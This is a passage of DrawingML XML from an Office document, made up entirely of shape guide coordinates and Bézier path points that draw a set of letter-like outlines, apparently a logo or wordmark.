                <a:gd name="connsiteY45" fmla="*/ 603815 h 941357"/>
                <a:gd name="connsiteX46" fmla="*/ 3452529 w 4182422"/>
                <a:gd name="connsiteY46" fmla="*/ 483862 h 941357"/>
                <a:gd name="connsiteX47" fmla="*/ 3587372 w 4182422"/>
                <a:gd name="connsiteY47" fmla="*/ 457833 h 941357"/>
                <a:gd name="connsiteX48" fmla="*/ 3649691 w 4182422"/>
                <a:gd name="connsiteY48" fmla="*/ 459686 h 941357"/>
                <a:gd name="connsiteX49" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY49" fmla="*/ 462463 h 941357"/>
                <a:gd name="connsiteX50" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY50" fmla="*/ 442018 h 941357"/>
                <a:gd name="connsiteX51" fmla="*/ 3690611 w 4182422"/>
                <a:gd name="connsiteY51" fmla="*/ 388076 h 941357"/>
                <a:gd name="connsiteX52" fmla="*/ 3612503 w 4182422"/>
                <a:gd name="connsiteY52" fmla="*/ 366677 h 941357"/>
                <a:gd name="connsiteX53" fmla="*/ 3590190 w 4182422"/>
                <a:gd name="connsiteY53" fmla="*/ 367618 h 941357"/>
                <a:gd name="connsiteX54" fmla="*/ 3539954 w 4182422"/>
                <a:gd name="connsiteY54" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX55" fmla="*/ 3430216 w 4182422"/>
                <a:gd name="connsiteY55" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX56" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY56" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX57" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY57" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX58" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY58" fmla="*/ 331283 h 941357"/>
                <a:gd name="connsiteX59" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY59" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX60" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY60" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX61" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY61" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX62" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY62" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX63" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY63" fmla="*/ 692121 h 941357"/>
                <a:gd name="connsiteX64" fmla="*/ 2616030 w 4182422"/>
                <a:gd name="connsiteY64" fmla="*/ 866968 h 941357"/>
                <a:gd name="connsiteX65" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY65" fmla="*/ 941357 h 941357"/>
                <a:gd name="connsiteX66" fmla="*/ 2226352 w 4182422"/>
                <a:gd name="connsiteY66" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX67" fmla="*/ 2336114 w 4182422"/>
                <a:gd name="connsiteY67" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX68" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY68" fmla="*/ 844657 h 941357"/>
                <a:gd name="connsiteX69" fmla="*/ 2522107 w 4182422"/>
                <a:gd name="connsiteY69" fmla="*/ 797229 h 941357"/>
                <a:gd name="connsiteX70" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY70" fmla="*/ 705141 h 941357"/>
                <a:gd name="connsiteX71" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY71" fmla="*/ 688403 h 941357"/>
                <a:gd name="connsiteX72" fmla="*/ 2401201 w 4182422"/>
                <a:gd name="connsiteY72" fmla="*/ 737714 h 941357"/>
                <a:gd name="connsiteX73" fmla="*/ 2191955 w 4182422"/>
                <a:gd name="connsiteY73" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX74" fmla="*/ 2204978 w 4182422"/>
                <a:gd name="connsiteY74" fmla="*/ 416857 h 941357"/>
                <a:gd name="connsiteX75" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY75" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX76" fmla="*/ 338260 w 4182422"/>
                <a:gd name="connsiteY76" fmla="*/ 189573 h 941357"/>
                <a:gd name="connsiteX77" fmla="*/ 245317 w 4182422"/>
                <a:gd name="connsiteY77" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX78" fmla="*/ 431200 w 4182422"/>
                <a:gd name="connsiteY78" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX79" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY79" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX80" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY80" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX81" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY81" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX82" fmla="*/ 1715247 w 4182422"/>
                <a:gd name="connsiteY82" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX83" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY83" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX84" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY84" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX85" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY85" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX86" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY86" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX87" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY87" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX88" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY88" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX89" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY89" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX90" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY90" fmla="*/ 558285 h 941357"/>
                <a:gd name="connsiteX91" fmla="*/ 3285320 w 4182422"/>
                <a:gd name="connsiteY91" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX92" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY92" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX93" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY93" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX94" fmla="*/ 3284381 w 4182422"/>
                <a:gd name="connsiteY94" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX95" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY95" fmla="*/ 580595 h 941357"/>
                <a:gd name="connsiteX96" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY96" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX97" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY97" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX98" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY98" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX99" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY99" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX100" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY100" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX101" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY101" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX102" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY102" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX103" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY103" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX104" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY104" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX105" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY105" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX106" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY106" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX107" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY107" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX108" fmla="*/ 275065 w 4182422"/>
                <a:gd name="connsiteY108" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX109" fmla="*/ 401442 w 4182422"/>
                <a:gd name="connsiteY109" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX110" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY110" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX111" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY111" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX112" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY112" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX113" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY113" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX114" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY114" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX115" fmla="*/ 501792 w 4182422"/>
                <a:gd name="connsiteY115" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX116" fmla="*/ 468335 w 4182422"/>
                <a:gd name="connsiteY116" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX117" fmla="*/ 209085 w 4182422"/>
                <a:gd name="connsiteY117" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX118" fmla="*/ 175639 w 4182422"/>
                <a:gd name="connsiteY118" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX119" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY119" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX120" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY120" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX121" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY121" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX122" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY122" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX123" fmla="*/ 52059 w 4182422"/>
                <a:gd name="connsiteY123" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX124" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY124" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX125" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY125" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX126" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY126" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX127" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY127" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX128" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY128" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX129" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY129" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX130" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY130" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX131" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY131" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX132" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY132" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX133" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY133" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX134" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY134" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX135" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY135" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX136" fmla="*/ 1736636 w 4182422"/>
                <a:gd name="connsiteY136" fmla="*/ 147236 h 941357"/>
                <a:gd name="connsiteX137" fmla="*/ 1839860 w 4182422"/>
                <a:gd name="connsiteY137" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX138" fmla="*/ 1831511 w 4182422"/>
                <a:gd name="connsiteY138" fmla="*/ 489482 h 941357"/>
                <a:gd name="connsiteX139" fmla="*/ 1686412 w 4182422"/>
                <a:gd name="connsiteY139" fmla="*/ 692212 h 941357"/>
                <a:gd name="connsiteX140" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY140" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX141" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY141" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX142" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY142" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX143" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY143" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX144" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY144" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX145" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY145" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX146" fmla="*/ 750838 w 4182422"/>
                <a:gd name="connsiteY146" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX147" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY147" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX148" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY148" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX149" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY149" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX150" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY150" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX151" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY151" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX152" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY152" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX153" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY153" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX154" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY154" fmla="*/ 99437 h 941357"/>
                <a:gd name="connsiteX155" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY155" fmla="*/ 140311 h 941357"/>
                <a:gd name="connsiteX156" fmla="*/ 597510 w 4182422"/>
                <a:gd name="connsiteY156" fmla="*/ 66914 h 94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182422" h="941357">
                  <a:moveTo>
                    <a:pt x="3600394" y="545242"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3534369" y="545242"/>
                    <a:pt x="3512056" y="559193"/>
                    <a:pt x="3512056" y="599184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3512056" y="607533"/>
                    <a:pt x="3513935" y="615910"/>
                    <a:pt x="3516701" y="622437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3525078" y="643806"/>
                    <a:pt x="3544625" y="651261"/>
                    <a:pt x="3588311" y="651261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3634816" y="651261"/>
                    <a:pt x="3666445" y="641940"/>
                    <a:pt x="3687819" y="623348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3701781" y="611250"/>
                    <a:pt x="3705512" y="601959"/>
                    <a:pt x="3705512" y="574988"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3705512" y="549872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3675736" y="547095"/>
                    <a:pt x="3629231" y="545242"/>
                    <a:pt x="3600394" y="545242"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2419807" y="371294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2405871" y="371294"/>
                    <a:pt x="2391910" y="374071"/>
                    <a:pt x="2380740" y="378729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2336114" y="397323"/>
                    <a:pt x="2311948" y="443828"/>
                    <a:pt x="2311948" y="507071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2311948" y="525663"/>
                    <a:pt x="2314715" y="544255"/>
                    <a:pt x="2319386" y="560072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2332383" y="606576"/>
                    <a:pt x="2371450" y="635403"/>
                    <a:pt x="2421660" y="635403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2490503" y="635403"/>
                    <a:pt x="2536069" y="585180"/>
                    <a:pt x="2536069" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2536069" y="425236"/>
                    <a:pt x="2490503" y="371294"/>
                    <a:pt x="2419807" y="371294"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2771158" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2771158" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1904769" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1904769" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3615295" y="270888"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3639461" y="270888"/>
                    <a:pt x="3663653" y="272754"/>
                    <a:pt x="3685026" y="275531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3748260" y="284849"/>
                    <a:pt x="3789179" y="311820"/>
                    <a:pt x="3807787" y="357386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3818956" y="383415"/>
                    <a:pt x="3822687" y="412239"/>
                    <a:pt x="3822687" y="468045"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3822687" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="693107"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3676675" y="732155"/>
                    <a:pt x="3630170" y="749825"/>
                    <a:pt x="3563206" y="749825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3454382" y="749825"/>
                    <a:pt x="3393942" y="697747"/>
                    <a:pt x="3393942" y="603815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3393942" y="549872"/>
                    <a:pt x="3414402" y="508970"/>
                    <a:pt x="3452529" y="483862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3479488" y="467124"/>
                    <a:pt x="3525078" y="457833"/>
                    <a:pt x="3587372" y="457833"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3649691" y="459686"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3657129" y="459686"/>
                    <a:pt x="3686880" y="461552"/>
                    <a:pt x="3702694" y="462463"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3702694" y="442018"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3702694" y="409462"/>
                    <a:pt x="3699927" y="399230"/>
                    <a:pt x="3690611" y="388076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3677589" y="374114"/>
                    <a:pt x="3651570" y="366677"/>
                    <a:pt x="3612503" y="366677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3605065" y="366677"/>
                    <a:pt x="3597628" y="366677"/>
                    <a:pt x="3590190" y="367618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3554829" y="372259"/>
                    <a:pt x="3543685" y="383415"/>
                    <a:pt x="3539954" y="420619"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3430216" y="420619"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3433922" y="312734"/>
                    <a:pt x="3485098" y="270888"/>
                    <a:pt x="3615295" y="270888"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2404018" y="269903"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2464433" y="269903"/>
                    <a:pt x="2504439" y="286662"/>
                    <a:pt x="2547213" y="331283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2547213" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="692121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2654158" y="785132"/>
                    <a:pt x="2644867" y="826977"/>
                    <a:pt x="2616030" y="866968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2578842" y="918134"/>
                    <a:pt x="2518376" y="941357"/>
                    <a:pt x="2423513" y="941357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2284025" y="941357"/>
                    <a:pt x="2230083" y="899512"/>
                    <a:pt x="2226352" y="789773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2336114" y="789773"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2342638" y="831637"/>
                    <a:pt x="2363987" y="844657"/>
                    <a:pt x="2423513" y="844657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2476542" y="844657"/>
                    <a:pt x="2505379" y="830695"/>
                    <a:pt x="2522107" y="797229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2533251" y="774899"/>
                    <a:pt x="2536069" y="754443"/>
                    <a:pt x="2536069" y="705141"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2536069" y="688403"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2492356" y="724675"/>
                    <a:pt x="2456057" y="737714"/>
                    <a:pt x="2401201" y="737714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2275648" y="737714"/>
                    <a:pt x="2191955" y="646557"/>
                    <a:pt x="2191955" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2191955" y="476381"/>
                    <a:pt x="2196626" y="445691"/>
                    <a:pt x="2204978" y="416857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2231936" y="325711"/>
                    <a:pt x="2307278" y="269903"/>
                    <a:pt x="2404018" y="269903"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="338260" y="189573"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="245317" y="446957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431200" y="446957"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1408353" y="168636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1408353" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469732" y="635494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1624121" y="635494"/>
                    <a:pt x="1715247" y="549006"/>
                    <a:pt x="1715247" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1715247" y="256063"/>
                    <a:pt x="1624121" y="168636"/>
                    <a:pt x="1469732" y="168636"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3116056" y="135153"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="135153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="558285"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3233231" y="619662"/>
                    <a:pt x="3243486" y="634537"/>
                    <a:pt x="3285320" y="635479"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="635479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="736848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3284381" y="736848"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3167206" y="736848"/>
                    <a:pt x="3116056" y="690343"/>
                    <a:pt x="3116056" y="580595"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="283019"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2833452" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833452" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1967060" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967060" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275065" y="67826"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="401442" y="67826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501792" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468335" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209085" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175639" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
